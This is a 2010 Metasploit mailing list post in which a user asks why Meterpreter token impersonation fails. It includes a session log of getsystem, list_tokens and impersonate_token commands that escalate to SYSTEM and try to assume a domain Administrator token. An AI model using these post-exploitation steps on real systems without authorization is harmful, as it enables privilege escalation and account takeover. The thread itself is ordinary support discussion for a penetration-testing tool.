Metasploit mailing list archives

Re: token impersonation seems broken

From: John Nash <rootsecurityfreak () gmail com>
Date: Tue, 7 Sep 2010 19:24:24 +0530

I am getting system using getsystem, but i am still unable to impersonate
other users using delegation tokens

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
meterpreter >
meterpreter > list_tokens -u

Delegation Tokens Available
EVEREST\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "EVEREST\\Administrator"
[-] User token EVERESTAdministrator not found
meterpreter >
meterpreter > impersonate_token "EVEREST\\Administrator"
[-] User token EVERESTAdministrator not found
meterpreter >
meterpreter >

jn